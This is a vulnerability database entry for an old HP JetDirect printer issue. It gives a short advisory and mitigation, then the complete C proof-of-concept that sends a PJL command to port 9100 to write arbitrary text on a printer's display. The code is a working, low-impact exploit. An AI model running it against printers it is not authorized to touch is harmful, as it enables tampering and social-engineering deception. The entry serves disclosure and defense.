HP Printer Hack

vendor:

JetDirect enabled printers

by:

sili@l0pht.com

2.6

CVSS

LOW

Arbitrary String Injection

CWE

Product Name: JetDirect enabled printers

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

1997

Certain versions of HP JetDirect enabled printers provide a function (PJL command) that changes the LCD display on a printer over TCP/IP. Arbitrary strings can be sent to the LCD display by a remote user using this command. This represents more of a nuisance than a threat, although it is conceivable that the ability to modify the display could be used in some sort of 'social engineering' scheme.

Mitigation:

Disable the PJL command on the printer or restrict access to the printer from untrusted networks.

Source

Exploit-DB raw data:

/*
source: https://www.securityfocus.com/bid/2245/info

Certain versions of HP JetDirect enabled printers provide a function (PJL command) that changes the LCD display on a printer over TCP/IP. Arbitrary strings can be sent to the LCD display by a remote user using this command. This represents more of a nuisance than a threat, although it is conceivable that the ability to modify the display could be used in some sort of "social engineering" scheme. 
*/

/*
   HP Printer Hack
   12/8/97 sili@l0pht.com
*/

#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <stdio.h>

#define PORT 9100

int main (int argc, char *argv[]) {

  int sockfd,len,bytes_sent;   /* Sock FD */
  struct hostent *host;   /* info from gethostbyname */
  struct sockaddr_in dest_addr;   /* Host Address */
  char line[100];

  if (argc !=3) {
    printf("HP Display Hack\n--sili@l0pht.com 12/8/97\n\n%s printer \"message\"\n",argv[0]);
    printf("\tMessage can be up to 16 characters long\n");
    exit(1);
  }

  if ( (host=gethostbyname(argv[1])) == NULL) {
    perror("gethostbyname");
    exit(1);
  }

  printf ("HP Display hack -- sili@l0pht.com\n");
  printf ("Hostname:   %s\n", argv[1]);
  printf ("Message: %s\n",argv[2]);

  /* Prepare dest_addr */
  dest_addr.sin_family= host->h_addrtype;  /* AF_INET from gethostbyname */
  dest_addr.sin_port= htons(PORT) ; /* PORT defined above */

  /* Prepare dest_addr */
  bcopy(host->h_addr, (char *) &dest_addr.sin_addr, host->h_length);

  bzero(&(dest_addr.sin_zero), 8);  /* Take care of  sin_zero  ??? */


  /* Get socket */
/*  printf ("Grabbing socket....\n"); */
  if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0) {
    perror("socket");
    exit(1);
  }

  /* Connect !*/

  printf ("Connecting....\n");

  if (connect(sockfd, (struct sockaddr *)&dest_addr,sizeof(dest_addr)) == -1){
    perror("connect");
    exit(1);}

  /* Preparing JPL Command */

  strcpy(line,"\033%-12345X@PJL RDYMSG DISPLAY = \"");
  strncat(line,argv[2],16);
  strcat(line,"\"\r\n\033%-12345X\r\n");

  /* Sending data! */

/*  printf ("Sending Data...%d\n",strlen(line));*/
/*  printf ("Line: %s\n",line); */
  bytes_sent=send(sockfd,line,strlen(line),0);

  printf("Sent %d bytes\n",bytes_sent);
  close(sockfd);
}